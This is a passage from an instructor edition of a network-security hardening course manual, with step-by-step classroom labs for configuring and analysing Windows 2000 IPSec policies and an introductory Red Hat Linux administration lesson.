19. For Encryption Algorithm, select DES.

20. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

21. Click OK. If you receive an information box indicating that you are on aMedium security level, click OK to agree to it.

Lesson 2: Implementing IPSec 123

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 177: SCNP Hardening

22. Click OK twice to return to the Rule Properties.

23. Switch to the Authentication Methods tab.

24. Click Edit.

25. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

26. Click OK to close the Authentication Methods.

27. Click Close twice to exit the Policy Properties.

28. Assign the new policy, and close the console without saving settings.

Using Mismatched AH and ESP IPSec PoliciesYou have configured a policy where Student_Q will require other computers thatattempt to communicate with it to implement AH by using the MD5 algorithm;Student_Q also will respond only by using this algorithm. Now, let’s see whathappens when Student_P does not follow Student_Q’s lead.

TASK 2E-5Matching and Analyzing AH and ESP IPSec Policies

Note:Perform step 1 through step 2 only if you are designated as Student_Q.

1. Activate Network Monitor, and start a capture.

2. Monitor the network traffic between the Student_P and Student_Qmachines, while the ftp session is attempted, and fails, due to mis-matched policies.

Note: Perform step 3 through step 6 only if you are designated as Student_P.

3. At the command prompt, again enter ftp IP_address_of_Student_Q.

4. Observe that, after a substantial delay, you are not able to ftp toStudent_Q. In fact, you should receive a message stating that the connectionhas timed out.

5. Enter quit.

6. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_AH(md5)+ESP(des) policy and choose Assign. Close the console.

Note: Perform the following step only if you are designated as Student_Q.

7. Stop and view, then start a new capture.

124 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 178: SCNP Hardening

Note: Perform step 8 through step 11 only if you are designated asStudent_P.

8. At the command prompt, again enter ftp IP_address_of_Student_Q. Youshould be able to successfully ftp to Student_Q.

9. Log on as anonymous with no password.

10. Enter dir to see a list of files hosted on the ftp site.

11. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

12. In Network Monitor, stop and view the capture.

13. Observe that these captures are exactly the same as when the5_REQUEST_AH(md5)+ESP(des) and the 5_RESPOND_AH(md5)+ESP(des) policies were in force earlier.

14. Try to identify a difference in the negotiation process. There is no differ-ence with respect to the negotiation process, there is no difference withrespect to the encryption of all subsequent information, and so forth.

15. Examine the data beyond the IP header. Once ISAKMP establishes theencryption algorithms between the two machines, as far as an eavesdropperis concerned, there will be nothing but binary garbage beyond the IP header.

16. Close Network Monitor. You can save your capture to a file if you like.

Configuring All the OptionsNow, let’s step up the requirements for IPSec. Let’s say you were paranoid andwanted to use all the features set to their highest security settings. You will con-figure an IPSec policy on Student_Q that will use the SHA-1 algorithm to ensureintegrity and 3DES to ensure confidentiality. You will then configure Student_Qto demand IPSec of other computers. To do so, you will use a Require policyinstead of a Request policy. Finally, on Student_P, you will implement a corre-sponding Respond policy and establish communications with Student_Q.

Someone may bring up the question, “Hey, why would you use the integrity algo-rithm twice?” At this point, we’ll leave the answer as a smug “Because we can!”Actually, there is a more simplified explanation.

Most books on IPSec recommend using AH to ensure the integrity of the entirepacket and ESP just for confidentiality of the payload. Most books on IPSec alsosimply say that ESP “...can also be used for integrity.” Let’s look at this a littlemore carefully.

The AH’s function is to sign the entire packet, including the IP header. However,there are certain fields in the IP header that have to be excluded because they aredesigned to change. One example of this is when traversing a routed environ-ment, the 8-bit TTL field will decrement by 1 at each hop. The values containedwithin these fields cannot be signed, as the received value would not match thevalue at origin.

Lesson 2: Implementing IPSec 125

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 179: SCNP Hardening

The ESP’s function is to encrypt and/or sign everything but the IP header. InTransport Mode, using ESP’s signing functionality might be considered redundantwhen AH is around to do the job, especially when AH can sign even the IP head-ers (mostly).

It’s when IPSec is implemented in Tunnel Mode, as with a VPN solution, thatESP’s signing functionality has some meaning over and above that of AH. InTunnel Mode, there are two IP headers in each packet. The outer IP header is theone used by the tunnel endpoints to communicate with each other. Encapsulatedwithin this as payload data is the IP header, IP protocol, and the actual data of thetwo hosts communicating end-to-end via the tunnel. Therefore, when the tunnelendpoints use ESP’s integrity algorithm, the internal IP headers are treated as dataand will be completely signed.

By the way, before you get carried away with IPSec, it is also recommend thatyou read Bruce Schneier’s excellent critique on IPSec. You can find it at his com-pany’s Web site, www.counterpane.com.

TASK 2E-6Implementing the 7_REQUIRE_AH(sha)+ESP(sha+3des) Policy

Note:Perform this task only if you are designated as Student_Q. Student_P isadvised to follow along.

1. Create another IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 7_REQUIRE_AH(sha)+ESP(sha+3des), and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, and clickAdd.

7. On the IP Filter List tab, click the radio button for All IP Traffic.

8. Switch to the Filter Action tab.

9. Click the radio button for Require Security.

10. Click Edit.

11. Leave the radio button selected for Negotiate Security.

12. If necessary, remove all but one security method.

13. Select the remaining method, and click Edit.

126 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 180: SCNP Hardening

14. Under Security Method, click the Settings button found under Custom(For Expert Users).

15. Verify that AH is checked.

16. Select the integrity algorithm as SHA1.

17. Verify that ESP is checked.

18. Select ESP’s integrity algorithm as SHA1.

19. For Encryption Algorithm, select 3DES.

20. Under the Session Key settings, verify that the two boxes for generatingnew keys for both time and size are unchecked.

21. Click OK three times to return to the Rule Properties.

22. Switch to the Authentication Methods tab.

23. Click Edit.

24. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

25. Click OK, and then click Close twice to exit the Policy Properties.

26. Close the console without saving settings.

Configuring the AH-and-ESP IPSec Response PolicyIn order for the two hosts to communicate, they must have compatible IPSecpolicies implemented. By now, you are familiar with the procedure, so the fol-lowing task should be rather straightforward.

TASK 2E-7Implementing the 7_RESPOND_AH(sha)+ESP(sha+3des) Policy

Note:Perform this task only if you are designated as Student_P. Student_Q isadvised to follow along.

1. Create another IP Security Policy. Click Next.

2. For the IP Security Policy Name, enter 7_RESPOND_AH(sha)+ESP(sha+3des), and click Next.

3. Uncheck Activate The Default Response Rule, and click Next.

4. Uncheck Edit Properties, and click Finish.

Lesson 2: Implementing IPSec 127

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 181: SCNP Hardening

5. Double-click the new policy.

6. On the Rules tab, verify that Use Add Wizard is unchecked, check<Dynamic> Default Response, and click Edit.

7. Remove all but one security method.

8. Select the remaining method, and click Edit.

9. Under Security Method, click the Settings button found under Custom(For Expert Users).

10. Verify that AH is checked.

11. Select the integrity algorithm as SHA1.

12. Verify that ESP is checked.

13. Select ESP’s integrity algorithm as SHA1.

14. For Encryption Algorithm, select 3DES.

15. Under Session Key settings, verify that the two boxes for generating newkeys for both time and size are unchecked.

16. Click OK twice to return to the Rule Properties.

17. Switch to the Authentication Methods tab.

18. Click Edit.

19. Click the radio button for Use This String To Protect The Key Exchange(Preshared Key), and in the box, enter Purple Enigma to provide the textfor the preshared key.

20. Click OK twice, and then click Close to exit the Policy Properties.

21. Close the console without saving settings.

Implementing the Full IPSec SessionSo far, you have configured a policy where Student_Q will require other comput-ers that attempt to communicate with it to implement AH by using the SHA-1algorithm and ESP by using both the SHA-1 and 3DES algorithms; Student_Qalso will respond only by using this algorithm. Now, let’s see what happens whenStudent_P follows Student_Q’s lead.

When you perform the final analysis in Network Monitor, keep the following inmind: If you were to perform a Hex-to-Hex comparison of the two captures, youwould see that due to the additional overhead imposed by the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy over the 6_REQUIRE_AH(md5)+ESP(des)policy, the actual number of bits is greater. In fact, if you had tried to actuallytransfer large files between the two machines, then the number of frames wouldhave actually been greater.

128 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 182: SCNP Hardening

TASK 2E-8Implementing and Analyzing an AH(sha) andESP(sha+3des) IPSec Session

Note:Perform step 1 through step 2 only if you are designated as Student_Q.

1. Open your ipsec.mmc.msc console. Assign the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy. When you assign this policy, thepreviously assigned policy is automatically unassigned.

2. Start Network Monitor, and start a capture.

Note: Perform step 3 through step 7 only if you are designated as Student_P.

3. Open your ipsec.mmc.msc console. Assign the 7_RESPOND_AH(sha)+ESP(sha+3des) policy.

4. At the command prompt, enter ftp IP_address_of_Student_Q. You shouldbe able to successfully ftp to Student_Q.

5. Log on as anonymous with no password.

6. Enter dir to see a list of files hosted on the ftp site.

7. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

8. In Network Monitor, stop and view the capture.

9. Observe that these captures are more or less the same as when the6_REQUIRE_AH(md5)+ESP(des) and 5_RESPOND_AH(md5)+ESP(des)policies were in force earlier.

10. Identify any differences with respect to the negotiation process, encryp-tion, or integrity algorithms.

11. Close Network Monitor. You can save your capture to a file if you like.

Using the Filter ListsIn all of the previous scenarios, we spent most of the time trying to figure out theeffect of using various combinations of integrity and confidentiality algorithms.Once you have decided on a particular combination, you can also leverage thepolicy to explicitly secure network traffic, depending on network or host ID orprotocol. You can do this by editing the filter list.

Lesson 2: Implementing IPSec 129

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 183: SCNP Hardening

TASK 2E-9Editing Filter Lists to Explicitly Secure Traffic

Note:Perform step 1 through step 18 only if you are designated as Student_Q.

1. From the Start menu, choose Settings→Network And Dial-upConnections.

2. Right-click the Classroom Hub interface, and choose Enable.

3. Ping the IP address of your nearest router. You should not be able toreach the router, as the IPSec policy on your machine is restrictive.

4. Open the ipsec.mmc.msc console and unassign the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy.

5. Double-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des).

6. On the Rules tab, under IP Security Rules, select All IP Traffic.

7. Click Edit.

8. Under IP Filter Lists, select All IP Traffic.

9. Click Edit.

10. Under Filters, observe that one rule is already included for you.

11. Select this rule and click Edit.

12. In the Filter Properties dialog box, observe the drop-down lists for SourceAddress and Destination Address.

13. For Source Address, select My IP Address, if necessary.

14. For Destination Address, select A Specific IP Address.

15. In the IP Address box, enter the specific IP address for Student_P (172.26.10.x or 172.28.10.x).

16. Leave Mirrored checked.

17. Click OK, and then click Close three times.

18. Right-click the policy 7_REQUIRE_AH(sha)+ESP(sha+3des), and chooseAssign.

Note: Perform step 19 through step 24 only if you are designated asStudent_P.

19. From the Start menu, choose Settings→Network And Dial-upConnections.

20. Right-click the Partner interface, and choose Properties.

130 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 184: SCNP Hardening

21. Double-click Internet Protocol (TCP/IP).

22. Edit the IP address by adding 100 to the last octet. That is, if the IPaddress is 172.26.10.1, make it 172.26.10.101.

23. Click OK twice.

24. At a command prompt, enter ipconfig to verify the change in your IPaddress.

Note: Perform the next step only if you are designated as Student_Q.

25. Activate Network Monitor, and start a capture.

Note: Perform step 26 through step 29 only if you are designated asStudent_P.

26. At the command prompt, enter ftp IP_address_of_Student_Q. You shouldbe able to successfully ftp to Student_Q.

27. Log on as anonymous with no password.

28. Enter dir to see a list of files hosted on the ftp site.

29. Exit the ftp session, and close all open windows.

Now let’s look at the captures in Network Monitor and see what was differ-ent from the previous capture.

Note: Perform the rest of this task only if you are designated as Student_Q.Student_P is advised to follow along and participate in any ensuingdiscussion.

30. In Network Monitor, stop and view the capture.

31. Observe that there is no ISAKMP negotiation, no ESP, and so forth.

32. Why did the supposedly secure Require IPSec policy allow Student_P tocommunicate with it in plaintext?

When you added the specifications to the filter list, Student_Q looked to seeif the specific IP address was in the IP header. It would apply IPSec policiesonly if its communication was with the specified machine. Because Student_P’s IP address was changed, its IP header did not match that on the filter.So, insecure communication was allowed to take place.

33. Ping your nearest router.

Are you able to ping the router? Why or why not?

You are able to ping the router for the same reason as Student_P could com-municate with Student_Q.

What this means is that, if traffic between sensitive machines needs to beprotected, you can modify the filter lists to do so. All other traffic to thosesame machines from other hosts will not be protected. It is up to you as theIPSec policy designer to come up with these schemes for your company.

Lesson 2: Implementing IPSec 131

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 185: SCNP Hardening

34. Close Network Monitor and any other open windows.

35. Disable the Classroom Hub interface. The Partner interface should still beenabled.

Using CertificatesWithout going into the details of setting up a CA or obtaining IPSec certificatesfrom a CA, we will see how easy it is to use a certificate for IPSec once youhave it. An IPSec certificate contains all of the attributes and keys required toleverage the integrity and confidentiality functions of IPSec. We have created acertificate that you can use for this purpose.

TASK 2E-10Using Certificates for Authentication

Note:Perform step 1 through step 12 on all student computers.

1. In your ipsec.mmc.msc console, choose Console→Add/Remove Snap-in.

2. Click Add.

3. Click Certificates, and click Add.

4. Select the radio button for Computer Account, and click Next.

5. Click Finish, click Close, and then click OK.

6. Expand Certificates (Local Computer).

7. Expand Trusted Root Certification Authorities.

8. Right-click Certificates, and choose All Tasks→Import. The CertificateImport Wizard is displayed.

9. Click Next.

10. Click Browse and browse to the IPSec certificate on your courseCD-ROM, in the \085545\Data\Certificates folder. You might have to clickthe Files Of Type drop-down list and select X.509 or *.cer to see thecertificate.

11. Select newroot.cer and click Open.

12. Click Next twice, and then click Finish. Click OK.

Note: Perform step 13 through step 22 only if you are designated asStudent_Q.

13. Click IP Security Policies On Local Machine.

14. Double-click 7_REQUIRE_AH(sha)+ESP(sha+3des).

Installing CAs andcertificates was covered in

detail in the prerequisitecourses.

132 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 186: SCNP Hardening

15. Select All IP Traffic and click Edit.

16. On the IP Filter List tab, select All IP Traffic, and click Edit. Edit the fil-ter to return the Destination Address to Any IP Address. Click OK, andthen click Close.

17. Click the Authentication Methods tab.

18. Click Edit.

19. Select the radio button for Use A Certificate From This CA, and clickBrowse.

20. Scroll down the list and select SCPR01. Feel free to view and explore thecertificate if you like. Click OK.

21. Click OK, and then click Close twice.

22. Verify that the 7_REQUIRE_AH(sha)+ESP(sha+3des) policy is assigned,and close the console.

Note: Perform step 23 through step 37 only if you are designated asStudent_P.

23. Click IP Security Policies On Local Machine.

24. Double-click 7_RESPOND_AH(sha)+ESP(sha+3des).

25. Click Edit.

26. Click the Authentication Methods tab.

27. Click Edit.

28. Select the radio button for Use A Certificate From This CA, and clickBrowse.

29. Scroll down the list and select SCPR01. Feel free to view and explore thecertificate if you like. Click OK.

30. Click OK twice, and then click Close.

31. Verify that the 7_RESPOND_AH(sha)+ESP(sha+3des) policy is assigned,and close the console without saving the settings.

32. From the Start menu, choose Settings→Network And Dial-upConnections.

33. Right-click the Partner interface, and choose Properties.

34. Double-click Internet Protocol (TCP/IP).

35. Edit the IP address by subtracting 100 from the last octet. That is, if theIP address is 172.26.10.101, go back to your originally assigned IP addressfor that interface and make it 172.26.10.1.

36. Click OK twice.

Lesson 2: Implementing IPSec 133

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 187: SCNP Hardening

37. Open a command prompt and enter ipconfig to verify the change in yourIP address.

Note: Perform the next step only if you are designated as Student_Q.

38. Activate Network Monitor, and start a capture.

Note: Perform step 39 through step 42 only if you are designated asStudent_P.

39. At the command prompt, enter ftp IP_address_of_Student_Q. You shouldbe able to successfully ftp to Student_Q. If the ftp attempt does not work,skip the next three steps.

40. Log on as anonymous with no password.

41. Enter dir to see a list of files hosted on the ftp site.

42. Exit the ftp session.

Note: Perform the rest of this task only if you are designated as Student_Q.

43. In Network Monitor, stop and view the capture.

44. Verify that ISAKMP negotiations took place, and then close NetworkMonitor.

Disabling IPSecNow that you have examined and implemented various forms of IPSec, you needto turn IPSec off to ensure that the remainder of the tasks throughout the coursewill run smoothly, and with no issues.

TASK 2E-11Removing IPSec

Note:Perform this task on all student machines.

1. Open the ipsec.mmc.msc.

2. Verify that all IPSec policies are listed as Unassigned. If a policy is stillassigned, unassign it now.

3. Close the console, saving changes if you like.

4. In the Network And Dial-up Connections Control Panel, right-click theClassroom Hub interface, and choose Enable.

5. Right-click the Partner interface, and choose Disable.

134 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 188: SCNP Hardening

6. Ping an IP address elsewhere in the classroom to be sure you have theproper connectivity.

7. Close all open windows.

SummaryIn this lesson, you worked with a Microsoft Management Console (MMC).You configured an MMC and viewed the default or built-in IPSec policies.You then created custom IPSec policies. You implemented and tested thesepolicies. You also took a first look at implementing filter lists and experi-mented with a couple of authentication methods—preshared keys andcertificates.

Lesson Review2A What are the two protocols in IPSec that are used to protect network

traffic?

The Encapsulating Security Protocol (ESP) and the Authentication Header(AH).

What are the two main modes of implementation for IPSec?

Transport Mode and Tunnel Mode.

If you are going to set up a VPN with IPSec, what mode will you prob-ably use?

Tunnel Mode.

2B What are the three default IPSec policies in Windows 2000?

Server (Require Security), Server (Request Security), and Client (RespondOnly).

What integrity algorithms are supported in Windows 2000 IPSec?

MD5 and SHA-1.

What encryption algorithms are supported in Windows 2000 IPSec?

DES and 3DES.

2C What authentication methods are supported in Windows 2000 imple-mentation of IPSec?

Kerberos, Certificates, and Preshared Keys.

What are the default key lifetimes?

A new key is generated for every 100 MB of data exchanged between thetwo IPSec devices or every 15 minutes, whichever is earlier.

Verify that all students havecompleted this task beforeyou proceed, or theremaining tasks might notwork as expected.

Lesson 2: Implementing IPSec 135

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 189: SCNP Hardening

2D What protocol and port are used by ISAKMP during the negotiationprocess?

UDP and Port 500.

In Transport Mode, while AH ensures the integrity of the entire IPdatagram, ESP can be used to ensure the confidentiality and integrity ofthe payload (or data).

2E When would ESP’s integrity check be most usefully employed?

When implementing IPSec in Tunnel Mode. ESP’s integrity check at the tun-nel endpoint will ensure the integrity of the payload (including theencapsulated packet, internal IP headers, and all other data).

Using filters, it is possible to explicitly control IPSec traffic.

136 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 190: SCNP Hardening

Hardening Linux Computers

OverviewIn this lesson, you will be introduced to the core operation of Linux, specifi-cally Red Hat Linux version 8.0. You will examine the process of securingfiles and directories, and securing user accounts and passwords. You willsecure services and network connections, and disable unneeded services. Thelesson will end with the implementation of SSH for secure communicationand the functioning of Bastille, for total system hardening.

ObjectivesIn this lesson, you will:

3A Perform fundamental Linux administration.

You will navigate in Linux to create users, groups, files, and directories.You will modify their properties, and identify system information.

3B Configure fundamental Linux security.

You will create file and directory permissions, secure user passwords, andimplement Pluggable Authentication Modules (PAMs).

3C Secure access to Linux services.

You will secure access to services by configuring and implementing TCPwrappers and xinetd.

3D Configure network services.

You will use the Network File System and Samba as network services,and examine methods of securing these services.

3E Harden Linux.

You will secure the system startup and shutdown processes, examineLinux logging, implement Tripwire, and lock the machine with Bastille.

Data Filesnone

Lesson Time8 hours

LESSON

3

Lesson 3: Hardening Linux Computers 137

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 191: SCNP Hardening

Topic 3AIntroduction to Linux AdministrationNo discussion on Linux would be complete without a mention of open-sourcesoftware. Open-source software does not mean that access is available to thesource code of the application. Open-source software is defined by the OpenSource Initiative (www.opensource.org/) as having 10 different criteria that mustbe met to be considered open source. These criteria include distribution, license,source code, and redistribution issues. The following list, from the Open SourceInitiative, describes the general open-source criteria.

1. Free redistribution—The license on the software must not restrict anyonefrom selling or giving away the software. The license is not to require a feeor royalty for distribution.

2. Source code—The software must include the source code, along with thecompiled software. The code is to be in a format preferred by programmerswho would use it to modify the program.

3. Derived works—The license on the software must allow for modificationsand creation of derived works, which must in turn be made available usingthe same terms as the license on the original software.

4. Integrity of author’s source code—The license on the software is allowed torestrict the distribution of the source code if the license allows for the distri-bution of patch files with the source code, for the purpose of modifying thesoftware at build time. The license may require any Derivative Works to usea different name and/or version number from the author’s original software.

5. No discrimination against persons or groups—The license on the softwaremust not discriminate against any person or group of persons.

6. No discrimination against fields of endeavor—The license on the softwaremust not restrict use of the software in any field of endeavor.

7. Distribution of license—The rights on the software must apply to all whomthe software is redistributed to, without execution of new or additionallicenses.

8. License must not be specific to a product—The license on the software mustnot be dependent on the software being part of a specific softwaredistribution.

9. License must not restrict other software—The license on the software mustnot place any restrictions on other software that is distributed along with thelicensed software.

10. License must be technology-neutral—No provision of the license may bepredicated on any individual technology or style of interface.

Open-source Criteria

138 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 192: SCNP Hardening

LinuxLinux is an operating system (OS) similar to UNIX, originally created by LinusTorvalds, with programming help from around the world. Linux is developedunder the GNU General Public License. The GNU Public License is a full legaldocument, which addresses the points raised under the general guidelines of theOpen Source Initiative. The GNU document can be found at www.linux.org/info/gnu.html.

Linux itself can be found in many variations today. Although the source code isavailable to be downloaded and used at will, there are many packages of Linuxthat are not distributed for free. These organizations are able to charge money fortheir distribution of Linux, allowing that the source code is always released andavailable. Some of the Linux distribution packages include Red Hat, SuSE,Caldera, and MandrakeSoft.

The KernelLinux is developed to run on personal computers, but it can run on many plat-forms other than the PC. Linux has been ported, or modified, to run on thefollowing platforms: PowerPC, Macintosh, DEC Alpha, Sun Sparc, and others.Linux has POSIX compatibility in order to interoperate with other UNIX-likecomputers.

When Linux is turned on, it loads and runs the core operating system program,which is called the kernel. The core operating system is then designed to run theother applications on the computer. The kernel is something that is always underdevelopment, and is always available in both a stable release and testing release.

A major benefit to the design of Linux is that the kernel is modular. This meansthat the individual components of the kernel can be easily updated and modifiedas new research dictates.

The Graphical InterfacesMost people who work with Linux are comfortable with using the command-lineinterface to work with the operating system. However, as Linux continues to gainmainstream use, the inclusion of graphical interfaces has become an additionalfeature that users enjoy.

There are many different graphical interfaces in Linux. These interfaces in Linuxare often referred to as window managers. Popular graphical interfaces are the KDesktop Environment (KDE) and the GNU Network Object Model Environment(GNOME). These window managers provide users with point-and-click and drag-and-drop functionality and create user-friendly environments.

Basic Navigation in LinuxIn order to use Linux, and to follow the tasks in this lesson, you will need tobecome familiar with some of the fundamental terms and phrases. These commonterms are quickly defined as follows, and will be discussed in more detail wherethey come into the text of the lesson.

Term DefinitionShell prompt (TerminalWindow)

A command-line interface that functions as a go-between between theuser and the operating system.

In this lesson, the Linuxdistribution used is Red Hat8.0.

Lesson 3: Hardening Linux Computers 139

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 193: SCNP Hardening

Term DefinitionCommand line The actual location in the shell prompt where a user will enter

commands to the operating system.Panel A toolbar, found often across the bottom of the screen, which contains

buttons and shortcuts to often-used applications.Root A user account created during the installation of the operating system.

Root has complete access to the system. There are applications thatmust be run using the root account. The root account has similarities tothe Administrator account in Windows or the Supervisor account inNovell. As root has complete control over the system, care must be takenthat the account is properly secured. This account is sometimes referredto as the superuser account.

SU The su command enables a user to substitute another user account, suchas the Root account, without initially logging in as root. This allows forthe running of applications that require root access from a Shell Prompt,while logged in as a non-root user.

Man page The abbreviated way of saying manual page. The man pages are theinformation about a command. For example, to learn about the functionand/or use of the SU command, invoking the command man su at thecommand line shows the information about the su command. To close aman page, press the Q key.

X or X Windows The GUI environment in Linux. When using the X Window you aresimply using the GUI instead of the pure command line function of aconsole.

Logging InLogging in to Linux requires authentication, just as in any other modern operat-ing system. When first using the system, you are required to log in as root. Onceyou are in the system, you should create user accounts as needed for the users ofthe system. The user accounts are case-sensitive, so ROOT and root are two dif-ferent accounts. The default root account is all lower-case. A password is createdfor the root account during the installation of the operating system.

During the installation, Red Hat provides the option of logging in to either thetext mode or the graphical mode of operation. If the system is configured to usetext mode, after you enter your credentials, you will remain in the text mode ofoperation. To switch into the graphical user interface, you can enter the startxcommand, provided that X Windows has been properly configured on themachine.

The GUIAs mentioned earlier, there are several different window managers, such as KDEand GNOME. For this lesson, the GNOME GUI is the one that will be used. Anexample of a freshly installed GNOME desktop is shown in Figure 3-1.

140 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 194: SCNP Hardening

Figure 3-1: The GNOME desktop on a new install of Red Hat Linux.

The primary components of the GNOME desktop are panels, menus, windows,workspaces, Nautilus File Manager, Desktop Background, and the Main Menu(sometimes called the Start Here location).

• There can be several panels on the desktop, although the starting configura-tion of GNOME is to have one panel (called the menu panel) across thebottom.

• Menus can provide access to nearly all the files and functions of the system.Menus can be accessed from the menu panel by clicking the Main Menu.

• The Main Menu is where you can access applications, make system configu-ration changes, find files, and more. In the Red Hat 8 distribution, the RedHat icon, with the small triangle, is the Main Menu. In other installs ofGNOME, the Main Menu is a footprint icon.

• The Nautilus File Manager is the access point to files and directories in theGUI. You can display the contents of a file within a Nautilus window, or youcan open the file with a different application from Nautilus.

• The Desktop Background component is located behind all the other compo-nents on the desktop, and is an active part of the user interface. Objects canbe placed on the Desktop Background for quick access, and by right-clickinganywhere on an open portion of the Desktop Background, you can open amenu to open different programs, such as a Terminal.

• Workspaces provide the user the ability to have separate working desktops.You can open several windows in one workspace, for example, and then usethe Workplace Switcher to switch to another workspace with no openwindows. Figure 3-2 highlights these features of GNOME, showing twoopen workspaces.

Lesson 3: Hardening Linux Computers 141

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 195: SCNP Hardening

Figure 3-2: Desktop components highlighted on a Red Hat Linux system.

Terminal WindowAlthough much of the administration of the Linux computer can be done byusing a GUI, there are many people who will use the Terminal Window formuch—if not all—of their administration. Similar in nature to the DOS (or com-mand) prompt on a Windows machine, the Terminal Window is where you canenter commands to be executed by the computer.

142 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 196: SCNP Hardening

Figure 3-3: A blank Terminal Window opened in Red Hat 8.

Common CommandsBecause many of the tasks in this lesson will be performed in the Terminal Win-dow, it is important for you to become familiar with the Terminal Window andsome frequently used commands. Recall that in Linux, file names, directorynames, and commands are case-sensitive. When you are logged into the Linuxmachine, you will see the following prompt: [root@rh /]#. This is an indica-tor of the user account logged in (in this case, root) and the computer name (inthis case, rh), along with the current directory (in this case, /). The followingtable lists only a small grouping of the many commands in Linux, but you shouldbecome comfortable with all of them, including their functions.

Linux Notation orCommand Description/ Root directory../ Current directory.../ Parent directory.cat The catalog command lists the contents of a file. Common use: cat

<filename>

cd The change directory command changes the current directory. Commonuse: cd <directory_name>

cp The copy files command copies a file to a specified destination. Commonuse: cp <source_filename><destination_filename>

echo $PATH The echo $PATH command lets you see your current path, or the directoriesin which the system will search for executables.

export The export command shows the current OS environment variables.history The history command shows the command history of the terminal session,

up to 500 commands. You can see a shorter list, though; for example:history 10

ifconfig The ifconfig command shows your current TCP/IP configuration.

Common Linux Commands(2 slides)

If students are interestedand time permits, lead ashort discussion thatfocuses on comparingthese Linux commands totheir Windows and DOScounterparts.

Lesson 3: Hardening Linux Computers 143

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 197: SCNP Hardening

Linux Notation orCommand Descriptionkill The kill command ends a running process. Common use: kill <PID>,

where PID is the Process ID.ls The list command shows the contents of a directory. Common use:

ls <directory_name>

ls -al Using the -al option with the list command shows the contents of adirectory, including the system files, in long format.

ls -l Using the -l option with the list command shows the contents of a directoryin long format.

man The manual command opens manual pages (the file documentation) for aspecified command. Common use: man su

mkdir The make directory command creates a new directory. Common use:mkdir <directory_name>

mv The move command moves files and/or directories. Common use:mv <current_filename><new_filename>

passwd The password command changes your password.ps The process status command lists the running processes and their Process

IDs.pwd The print working directory command lists the full path of your current

working directory. It does not list the contents of the directory.rm The remove command deletes a specified file. Common use: rm

<filename>

rm -r Using the -r option with the remove command deletes a directory and all ofits contents. Common use: rm -r <directory_name>

rmdir The remove directory command deletes an empty directory. Common use:rmdir <directory_name>

shutdown The shutdown command shuts down the system.touch The touch command creates a file. Common use: touch

<filename>

In addition to the commands listed, you might want to use the keyboard shortcutsthat are available. Some of the common shortcuts are as listed in the followingtable.

Key Combination EffectCtrl+Alt+Backspace Kill X. Kills the current X session, and returns to the login screen

(used if the normal exit does not work). This key combinationworks only in the GUI.

Ctrl+Alt+Delete Shut down and reboot the system. Shuts down the currentsession, and reboots the OS (used if the normal shutdown doesnot work).

Ctrl+D Log out of a terminal or console session (used instead ofentering exit or logout).

Ctrl+Alt+Fx Switch screens. Ctrl+Alt and any function key—F1 through F7—displays a new screen. F1 to F6 are text screens, while F7 is theGUI.

Up Arrow Scroll through command history in the Terminal Window.

144 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 198: SCNP Hardening

The following task is designed to walk you through the basic process of usingLinux, creating directories and files. You will then copy, move, and delete files. Ifat any time you would like to see the options for a command, use the -help or -hswitch after the main command; for instance, chmod -help. You can also usethe man pages to find out more details about any command.

TASK 3A-1Navigating in Linux

1. Reboot and log on to Red Hat 8 as root, with the password qwerty.

2. If the GUI does not start automatically, enter startx at the command prompt.

3. Right-click anywhere in the Desktop Background, and choose NewTerminal.

4. In the Terminal Window, enter cd / to navigate to the top of the directorystructure.

5. Enter mkdir lab1 to create a new directory.

6. Create another new directory named lab2 by using the mkdir command.

7. Enter cd /lab1 to change to the lab1 directory.

8. Enter touch file1 to create a file.

9. Enter ls -l to view the detailed contents of the lab1 folder.

10. Enter cp /lab1/file1 /lab2/file2 to copy the file from one directory to theother.

11. Enter ls to verify that file1 is still in the lab1 directory.

